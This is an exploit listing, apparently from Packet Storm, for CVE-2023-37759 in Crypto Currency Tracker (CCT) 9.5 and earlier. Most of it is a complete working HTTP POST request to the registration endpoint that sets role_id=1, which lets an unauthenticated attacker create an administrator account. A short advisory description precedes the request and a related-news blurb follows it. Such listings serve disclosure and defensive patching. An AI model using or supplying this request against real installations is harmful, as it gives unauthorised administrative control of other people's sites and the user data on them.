Headline
CVE-2023-37759: Crypto Currency Tracker (CCT) 9.5 Add Administrator ≈ Packet Storm
Incorrect access control in the User Registration page of Crypto Currency Tracker (CCT) before v9.5 allows unauthenticated attackers to register as an Admin account via a crafted POST request.
# Exploit Title: Crypto Currency Tracker (CCT) - Admin Account Creation (Unauthenticated)# Date: 11.08.2023# Exploit Author: 0xBr# Software Link: https://codecanyon.net/item/crypto-currency-tracker-prices-charts-news-icos-info-and-more/21588008# Version: <=9.5# CVE: CVE-2023-37759POST /en/user/register HTTP/2Host: localhostCookie: XSRF-TOKEN=[TOKEN]; laravel_session=[LARAVEL_SESSION]; SELECTED_CURRENCY=USD; SELECTED_CURRENCY_PRICE=1; cookieconsent_status=dismissAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-GB,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 756_token=[_TOKEN]&name=testing&role_id=1&email=testing%40testing.testing&password=testing&g-recaptcha-response=[G-RECAPTCHA-RESPONSE]&submit_register=RegisterRelated news
Crypto Currency Tracker (CCT) 9.5 Add Administrator
Crypto Currency Tracker (CCT) versions 9.5 and below suffer from a flaw that allows an administrative account to be added without authentication.